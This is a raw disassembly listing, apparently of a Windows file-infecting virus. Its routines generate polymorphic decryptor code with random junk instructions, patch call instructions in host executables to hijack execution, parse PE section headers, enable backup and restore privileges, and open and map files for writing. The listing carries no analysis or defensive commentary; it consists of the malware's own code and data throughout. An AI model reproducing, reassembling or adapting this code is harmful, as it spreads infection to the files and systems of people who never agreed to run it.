dd 0FE72E851h, 0B503FFFFh, 1042F8h, 78C085ADh, 84840FFBh
dd 0FF000000h, 1042F8B5h, 55E85000h, 3FFFFFEh, 1042F885h
dd 0F8858F00h, 3001042h, 83532404h, 0DB3302C0h, 0E308B60Fh
dd 20C98012h, 2424C153h, 241C2904h, 5B240C29h, 81E9EB40h
dd 0BBD70FFBh, 813E74DDh, 6E45A8FBh, 813674DBh, 0A13B59FBh
dd 812E74FFh, 0B522D6FBh, 812674ACh, 58E993FBh, 811E74F3h
dd 58E97DFBh, 811674F3h, 253F46FBh, 810E74E1h, 253F30FBh
dd 0FF0674E1h, 1042D495h, 71E95B00h, 5EFFFFFFh, 0E914C283h
dd 0FFFFFEEFh, 46A01C3h, 0F549E858h, 9588FFFFh, 102641h
dd 1831B866h, 0E4C0E202h, 66E20203h, 58066AABh, 0FFF52EE8h
dd 8C283FFh, 56AD187h, 0F521E858h, 0FA80FFFFh, 0B00B7303h
dd 41850250h, 0AA001026h, 686A27EBh, 0FA80AA58h, 0B0187503h
dd 0F501E811h, 1B8FFFFh, 84000000h, 0D10D74D2h, 0EBCAFEE0h
dd 0B805EBF6h, 80000000h, 0C3BFE2ABh, 39CC958Dh, 0D72B0010h
dd 0F7C3DAF7h, 1039C085h, 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], edi
jnz short loc_31441766
or ax, 2589h
jmp short loc_31441779
; ---------------------------------------------------------------------------
loc_31441766: ; CODE XREF: UPX2:3144175E�j
test byte ptr [ebp+1039BEh], 2
jnz short loc_31441775
or ax, 2531h
jmp short loc_31441779
; ---------------------------------------------------------------------------
loc_31441775: ; CODE XREF: UPX2:3144176D�j
or ax, 2501h
loc_31441779: ; CODE XREF: UPX2:31441764�j
; UPX2:31441773�j
stosw
call near ptr dword_314414A0+29Ch
mov eax, [ebx+34h]
mov [ebp+1042E8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_3144178B proc near ; CODE XREF: UPX2:31441DD7�p
test dword ptr [ebp+1039C0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_314414A0+29Ch
mov [ebp+1042ECh], edx
test byte ptr [ebp+1039BEh], 1
jnz short loc_314417B3
rdtsc
jmp short loc_314417B5
; ---------------------------------------------------------------------------
loc_314417B3: ; CODE XREF: sub_3144178B+22�j
sub eax, eax
loc_314417B5: ; CODE XREF: sub_3144178B+26�j
stosd
retn
sub_3144178B endp
; =============== S U B R O U T I N E =======================================
sub_314417B7 proc near ; CODE XREF: UPX2:loc_31441DE1�p
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_314417EA
mov al, [ebp+1039BAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039BAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_314417FC
; ---------------------------------------------------------------------------
loc_314417EA: ; CODE XREF: sub_314417B7+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039BAh]
add al, 58h
shl eax, 18h
stosd
locret_314417FC: ; CODE XREF: sub_314417B7+31�j
retn
sub_314417B7 endp
; =============== S U B R O U T I N E =======================================
sub_314417FD proc near ; CODE XREF: sub_3144186F:loc_31441896�p
; sub_3144186F+4C�p ...
mov byte ptr [ebp+10279Ch], 9
jmp short loc_3144182B
; ---------------------------------------------------------------------------
loc_31441806: ; CODE XREF: sub_314417FD+44�j
mov al, 0FCh
jmp short loc_3144182A
; ---------------------------------------------------------------------------
loc_3144180A: ; CODE XREF: sub_314417FD+48�j
mov ax, 0EBh
stosw
jmp short loc_3144182B
; ---------------------------------------------------------------------------
loc_31441812: ; CODE XREF: sub_314417FD+4C�j
push 4
pop eax
call near ptr dword_31440BE0+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_3144182B
; ---------------------------------------------------------------------------
loc_31441828: ; CODE XREF: sub_314417FD+50�j
mov al, 90h
loc_3144182A: ; CODE XREF: sub_314417FD+B�j
; sub_314417FD+60�j ...
stosb
loc_3144182B: ; CODE XREF: sub_314417FD+7�j
; sub_314417FD+13�j ...
push 27h
pop eax
call near ptr dword_31440BE0+43h
add byte ptr [ebp+10279Ch], 6
cmp dl, 8
jnb short locret_3144186E
test dl, dl
jz short loc_31441806
dec dl
jz short loc_3144180A
dec dl
jz short loc_31441812
dec dl
jz short loc_31441828
dec dl
jz short loc_3144185F
dec dl
jz short loc_31441866
dec dl
jz short loc_3144186A
mov al, 0F9h
jmp short loc_3144182A
; ---------------------------------------------------------------------------
loc_3144185F: ; CODE XREF: sub_314417FD+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_3144182A
; ---------------------------------------------------------------------------
loc_31441866: ; CODE XREF: sub_314417FD+58�j
mov al, 0F5h
jmp short loc_3144182A
; ---------------------------------------------------------------------------
loc_3144186A: ; CODE XREF: sub_314417FD+5C�j
mov al, 0F8h
jmp short loc_3144182A
; ---------------------------------------------------------------------------
locret_3144186E: ; CODE XREF: sub_314417FD+40�j
retn
sub_314417FD endp
; =============== S U B R O U T I N E =======================================
sub_3144186F proc near ; CODE XREF: UPX2:loc_31441CB8�p
; UPX2:31441E6B�p
test dword ptr [ebp+1039C0h], 2000h
mov al, 86h
jnz short loc_3144187F
add al, 4
loc_3144187F: ; CODE XREF: sub_3144186F+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short loc_31441896
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_31441896: ; CODE XREF: sub_3144186F+1E�j
call sub_314417FD
test dword ptr [ebp+1039C0h], 4000h
mov ax, 3166h
jnz short loc_314418AD
mov ah, 29h
loc_314418AD: ; CODE XREF: sub_3144186F+3A�j
stosw
mov al, 18h
or al, [ebp+1039BAh]
shl al, 3
stosb
call sub_314417FD
mov al, 88h
test dword ptr [ebp+1039C0h], 8000h
jnz short loc_314418D0
mov al, 86h
loc_314418D0: ; CODE XREF: sub_3144186F+5D�j
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short locret_314418E4
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_314418E4: ; CODE XREF: sub_3144186F+6C�j
retn
sub_3144186F endp
; ---------------------------------------------------------------------------
loc_314418E5: ; CODE XREF: sub_314424EB+183�p
lea edi, [ebp+1039CCh]
call sub_314417FD
test dword ptr [ebp+1039C0h], 400000h
jz short near ptr unk_314418FF
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_314418FF db 0F7h ; ; CODE XREF: UPX2:314418FA�j
db 85h ;
db 0C0h ;
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042D8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0DCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39C085F7h
dd 30010h, 1A740000h, 39C085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042D8h, 0C82BCF8Bh
dd 42E0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039C085h, 300h, 0F6137400h, 1039BE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39C085F7h
dd 30010h, 5A740000h, 39BE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0C0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042E085h, 89C82B00h, 85F7FC48h
dd 1039C0h, 3, 85F73874h, 1039C0h, 0C000000h, 85F72C74h
dd 1039C0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39C085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039C0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039C0h
dd 8, 0BD807275h, 1039BEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0BAA50AC9h, 0C0001039h, 0A50A03E4h, 1039BAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0BE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039BAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0C085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042C4BDh, 0C085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039C085h, 0
dd 89187480h, 1042F0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039B8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0C085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39B8A50Ah, 0AB660010h, 42C8BD89h
dd 0F7AB0010h, 1039C085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_31441B90
mov al, 50h
add al, [ebp+1039B8h]
stosb
loc_31441B90: ; CODE XREF: UPX2:31441B85�j
test dword ptr [ebp+1039C0h], 80h
jnz short loc_31441BA7
mov al, 0B8h
or al, [ebp+1039B9h]
stosb
jmp short loc_31441BE4
; ---------------------------------------------------------------------------
loc_31441BA7: ; CODE XREF: UPX2:31441B9A�j
mov ax, 1831h
test dword ptr [ebp+1039C0h], 100h
jz short loc_31441BB9
mov al, 29h
loc_31441BB9: ; CODE XREF: UPX2:31441BB5�j
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
mov ax, 0F081h
test dword ptr [ebp+1039C0h], 200h
jnz short loc_31441BDC
mov ah, 0C8h
loc_31441BDC: ; CODE XREF: UPX2:31441BD8�j
or ah, [ebp+1039B9h]
stosw
loc_31441BE4: ; CODE XREF: UPX2:31441BA5�j
mov [ebp+1042E4h], edi
mov eax, 29CCh
stosd
test dword ptr [ebp+1039C0h], 8
jz short loc_31441C6D
call sub_314417FD
test dword ptr [ebp+1039C0h], 400h
jnz short loc_31441C18
mov al, 0B8h
or al, [ebp+1039BAh]
stosb
jmp short loc_31441C65
; ---------------------------------------------------------------------------
loc_31441C18: ; CODE XREF: UPX2:31441C0B�j
test dword ptr [ebp+1039C0h], 800h
jnz short loc_31441C35
mov ax, 0E083h
or ah, [ebp+1039BAh]
stosw
xor eax, eax
stosb
jmp short loc_31441C4A
; ---------------------------------------------------------------------------
loc_31441C35: ; CODE XREF: UPX2:31441C22�j
mov ax, 1829h
or ah, [ebp+1039BAh]
shl ah, 3
or ah, [ebp+1039BAh]
stosw
loc_31441C4A: ; CODE XREF: UPX2:31441C33�j
test dword ptr [ebp+1039C0h], 1000h
mov ax, 0C081h
jz short loc_31441C5D
add ah, 8
loc_31441C5D: ; CODE XREF: UPX2:31441C58�j
or ah, [ebp+1039BAh]
stosw
loc_31441C65: ; CODE XREF: UPX2:31441C16�j
movzx eax, byte ptr [ebp+1039BEh]
stosd
loc_31441C6D: ; CODE XREF: UPX2:31441BFA�j
call sub_314417FD
test dword ptr [ebp+1039C0h], 40000000h
jz short loc_31441C8C
mov al, 50h
add al, [ebp+1039B8h]
stosb
call sub_314417FD
loc_31441C8C: ; CODE XREF: UPX2:31441C7C�j
lea ecx, [edi-2]
mov [ebp+1042CCh], ecx
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_31441CB8
mov al, 0E8h
stosb
mov eax, [ebp+1042F0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042F0h], edi
jmp short loc_31441CBD
; ---------------------------------------------------------------------------
loc_31441CB8: ; CODE XREF: UPX2:31441C9F�j
call sub_3144186F
loc_31441CBD: ; CODE XREF: UPX2:31441CB6�j
call sub_314417FD
test dword ptr [ebp+1039C0h], 10000h
jnz short loc_31441CD9
mov al, 40h
or al, [ebp+1039B8h]
stosb
jmp short loc_31441CE8
; ---------------------------------------------------------------------------
loc_31441CD9: ; CODE XREF: UPX2:31441CCC�j
mov ax, 0C083h
or ah, [ebp+1039B8h]
stosw
mov al, 1
stosb
loc_31441CE8: ; CODE XREF: UPX2:31441CD7�j
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_31441D23
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_31441D1A
mov al, 0C0h
or al, [ebp+1039BAh]
mov ah, [ebp+1039BFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_31441D22
; ---------------------------------------------------------------------------
loc_31441D1A: ; CODE XREF: UPX2:31441CFE�j
mov al, 40h
or al, [ebp+1039BAh]
loc_31441D22: ; CODE XREF: UPX2:31441D18�j
stosb
loc_31441D23: ; CODE XREF: UPX2:31441CF2�j
test dword ptr [ebp+1039C0h], 80000h
jnz short loc_31441D3F
mov ax, 0E883h
or ah, [ebp+1039B9h]
stosw
mov al, 1
jmp short loc_31441D47
; ---------------------------------------------------------------------------
loc_31441D3F: ; CODE XREF: UPX2:31441D2D�j
mov al, 48h
or al, [ebp+1039B9h]
loc_31441D47: ; CODE XREF: UPX2:31441D3D�j
stosb
call sub_314417FD
test dword ptr [ebp+1039C0h], 100000h
mov cl, 75h
jnz short loc_31441D80
mov ax, 0F883h
or ah, [ebp+1039B9h]
stosw
xor eax, eax
stosb
sub [ebp+1042CCh], edi
test dword ptr [ebp+1039C0h], 200000h
jnz short loc_31441D9B
mov cl, 77h
jmp short loc_31441D9B
; ---------------------------------------------------------------------------
loc_31441D80: ; CODE XREF: UPX2:31441D59�j
mov ax, 1809h
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
sub [ebp+1042CCh], edi
loc_31441D9B: ; CODE XREF: UPX2:31441D7A�j
; UPX2:31441D7E�j
mov al, cl
mov ah, [ebp+1042CCh]
stosw
mov al, 58h
add al, [ebp+1039B8h]
stosb
call sub_314417FD
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_31441DEB
test dword ptr [ebp+1039C0h], 8000000h
jnz short loc_31441DEB
test dword ptr [ebp+1039C0h], 6000000h
jnz short loc_31441DE1
call sub_3144178B
call sub_314417FD
loc_31441DE1: ; CODE XREF: UPX2:31441DD5�j
call sub_314417B7
call sub_314417FD
loc_31441DEB: ; CODE XREF: UPX2:31441DBD�j
; UPX2:31441DC9�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_31441DFF
mov al, 0C9h
stosb
call sub_314417FD
loc_31441DFF: ; CODE XREF: UPX2:31441DF5�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_31441E35
mov al, 7
sub al, [ebp+1039B8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039B8h]
shl ah, 3
add ah, 4
stosd
call sub_314417FD
mov al, 61h
stosb
call sub_314417FD
loc_31441E35: ; CODE XREF: UPX2:31441E09�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
stosw
call sub_314417FD
test dword ptr [ebp+1039C0h], 20h
jz short loc_31441EC1
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_31441E7D
mov eax, edi
mov ecx, [ebp+1042F0h]
sub eax, ecx
mov [ecx-4], eax
call sub_3144186F
call sub_314417FD
mov al, 0C3h
stosb
call sub_314417FD
loc_31441E7D: ; CODE XREF: UPX2:31441E5C�j
mov eax, edi
mov ecx, [ebp+1042C4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039B8h]
stosb
call sub_314417FD
test dword ptr [ebp+1039C0h], 800000h
jz short loc_31441EB0
mov ax, 0C350h
or al, [ebp+1039B8h]
jmp short loc_31441EBA
; ---------------------------------------------------------------------------
loc_31441EB0: ; CODE XREF: UPX2:31441EA2�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
loc_31441EBA: ; CODE XREF: UPX2:31441EAE�j
stosw
call sub_314417FD
loc_31441EC1: ; CODE XREF: UPX2:31441E50�j
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_31441F2C
mov ecx, edi
mov eax, [ebp+1042DCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039C0h], 1000000h
jnz short loc_31441EF6
lea eax, [ebp+1039B8h]
loc_31441EEE: ; CODE XREF: UPX2:31441EF4�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_31441EEE
loc_31441EF6: ; CODE XREF: UPX2:31441EE6�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_31441F0B
mov ax, 0C031h
stosw
loc_31441F0B: ; CODE XREF: UPX2:31441F03�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_31441F24
mov ax, 0C031h
stosw
loc_31441F24: ; CODE XREF: UPX2:31441F1C�j
mov al, 0C3h
stosb
call sub_314417FD
loc_31441F2C: ; CODE XREF: UPX2:31441ECB�j
lea eax, [ebp+1039CCh]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_31441F44
push edi
sub edi, eax
pop eax
jmp short loc_31441F5D
; ---------------------------------------------------------------------------
loc_31441F44: ; CODE XREF: UPX2:31441F3C�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_31441F5D: ; CODE XREF: UPX2:31441F42�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_31441F7D
neg eax
loc_31441F7D: ; CODE XREF: UPX2:31441F79�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_31441F81 proc near ; CODE XREF: sub_314424EB+336�p
push esi
push edi
cmp dword ptr [ebp+104300h], 0
jz loc_31442169
call near ptr loc_31441FA1+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_31441FA1: ; CODE XREF: sub_31441F81+F�p
add bh, bh
sub_31441F81 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
mov [ebp+104314h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call near ptr dword_314414A0+4
mov edx, [ebp+1042F4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104318h], eax
add eax, [edx+8]
mov [ebp+10431Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call near ptr dword_314414A0+4
mov edi, [ebp+1042F4h]
push esi
call near ptr dword_314414A0+4
mov edx, [ebp+1042F4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_31442169
jz loc_31442169
add esi, [ebp+1042F8h]
add esi, [ebp+1042B4h]
; START OF FUNCTION CHUNK FOR sub_3144213A
loc_3144201B: ; CODE XREF: sub_3144213A+29�j
lodsb
cmp al, 0E8h
jnz loc_314420C6
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call near ptr dword_314414A0+4
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_31442049
cmp eax, [edi+0Ch]
jnb loc_31442162
jmp short loc_31442055
; ---------------------------------------------------------------------------
loc_31442049: ; CODE XREF: sub_3144213A-FE�j
cmp [ebp+1042F4h], edx
jnz loc_31442162
loc_31442055: ; CODE XREF: sub_3144213A-F3�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_31442162
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call near ptr dword_314414A0+4
cmp [ebp+1042F4h], edi
jnz loc_31442162
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_31442162
cmp eax, [edi+8]
jnb loc_31442162
loc_3144209E: ; CODE XREF: sub_3144213A+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_31442178
jmp loc_31442162
; ---------------------------------------------------------------------------
loc_314420C6: ; CODE XREF: sub_3144213A-11C�j
cmp al, 0FFh
jnz loc_31442162
cmp byte ptr [esi], 15h
jnz loc_31442162
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call near ptr dword_314414A0+4
cmp [ebp+1042F4h], edi
jnz short loc_31442162
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_3144210F
cmp eax, [ebp+10431Ch]
jb short loc_31442178
loc_3144210F: ; CODE XREF: sub_3144213A-35�j
cmp eax, 70000000h
jb short loc_3144214D
call sub_3144213A
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_31442139
add esp, 10h
push dword ptr [ecx]
pop [esp-8+arg_20]
popa
jmp short loc_31442154
; ---------------------------------------------------------------------------
locret_31442139: ; CODE XREF: sub_3144213A-F�j
retn
; END OF FUNCTION CHUNK FOR sub_3144213A
; =============== S U B R O U T I N E =======================================
sub_3144213A proc near ; CODE XREF: sub_3144213A-24�p
var_10 = dword ptr -10h
arg_20 = dword ptr 24h
; FUNCTION CHUNK AT 3144201B SIZE 0000011F BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call near ptr dword_314414A0+10Bh
popa
loc_3144214D: ; CODE XREF: sub_3144213A-26�j
test eax, 80000000h
jnz short loc_31442162
loc_31442154: ; CODE XREF: sub_3144213A-3�j
sub eax, [edi+0Ch]
jb short loc_31442162
cmp eax, [edi+8]
jb loc_3144209E
loc_31442162: ; CODE XREF: sub_3144213A-F9�j
; sub_3144213A-EB�j ...
dec ecx
jnz loc_3144201B
loc_31442169: ; CODE XREF: sub_31441F81+9�j
; UPX2:31442003�j ...
mov edi, [esp+0]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_314421BA
; ---------------------------------------------------------------------------
loc_31442178: ; CODE XREF: sub_3144213A-7F�j
; sub_3144213A-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+10h+var_10]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_314421BA: ; CODE XREF: sub_3144213A+3C�j
pop edi
pop esi
retn
sub_3144213A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_314421BD proc near ; CODE XREF: UPX2:314424BE�p
; FUNCTION CHUNK AT 314422E7 SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jnz loc_314422E7
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F1Ah]
test eax, eax
pop edi
js loc_314422E7
call sub_3144063F
call near ptr loc_314421F8+5
push ebx
db 65h
jz short near ptr unk_31442236
imul ebp, [ebp+53h], 72756365h
loc_314421F8: ; CODE XREF: sub_314421BD+2A�p
imul esi, [ecx+edi*2+41h], 88B5FF00h
sub_314421BD endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E6Eh]
mov [ebp+104290h], eax
call near ptr loc_3144222C+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_31442293
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_3144222C: ; CODE XREF: UPX2:3144220F�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ;
db 13h
db 0
unk_31442236 db 0 ; CODE XREF: sub_314421BD+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0Bh
db 0E8h ;
db 0FFh
db 0FFh
db 0E8h ;
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0EEh ;
db 0E7h ;
db 0FFh
db 0FFh
db 0E8h ;
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ;
db 0CBh ;
db 0E7h ;
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_31442293: ; CODE XREF: UPX2:3144221D�j
lea eax, [ebp+103DCCh]
push 64h
push eax
push 1
push edi
call dword ptr [ebp+103F26h]
mov [esp], edi
call dword ptr [ebp+103E62h]
sub al, al
lea edi, [ebp+104184h]
push eax
push eax
push eax
push dword ptr [ebp+103DCCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104290h]
push esp
push 4
push edi
call dword ptr [ebp+104290h]
add esp, 14h
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E9Eh]
; START OF FUNCTION CHUNK FOR sub_314421BD
loc_314422E7: ; CODE XREF: sub_314421BD+A�j
; sub_314421BD+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_314421BD
; =============== S U B R O U T I N E =======================================
sub_314422E9 proc near ; CODE XREF: UPX2:314424B7�p
; UPX2:314424C3�p ...
lea esi, [ebp+104184h]
push esi
call dword ptr [ebp+103EA2h]
cmp eax, 0FFFFFFFFh
jz locret_314423BA
mov [ebp+104294h], eax
push 0
push esi
call dword ptr [ebp+103EDEh]
test eax, eax
jz locret_314423BA
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E7Eh]
cmp eax, 0FFFFFFFFh
jz loc_3144293B
mov [ebp+104298h], eax
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+103EAAh]
cmp eax, 0FFFFFFFFh
jz loc_3144292F
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EA6h]
cmp eax, 0FFFFFFFFh
jz loc_3144292F
mov [ebp+1042ACh], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E82h]
test eax, eax
jz loc_3144292F
xor ecx, ecx
mov [ebp+1042B0h], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103ECAh]
test eax, eax
jz loc_31442907
mov [ebp+1042B4h], eax
locret_314423BA: ; CODE XREF: sub_314422E9+10�j
; sub_314422E9+27�j ...
retn
sub_314422E9 endp
; ---------------------------------------------------------------------------
loc_314423BB: ; CODE XREF: sub_314424EB+188�p
; sub_314424EB+2A0�p
mov eax, 7327h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ;
db 85h ;
db 0C0h ;
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042C0h], eax
mov eax, 29CBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_31442400 proc near ; CODE XREF: sub_314424EB:loc_31442560�p
; sub_314424EB+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_31442405: ; CODE XREF: sub_31442400+23�j
jecxz short locret_3144243C
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_3144243C
cmp dword ptr [edx+0Ch], 1
jb short loc_31442405
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+1042ACh]
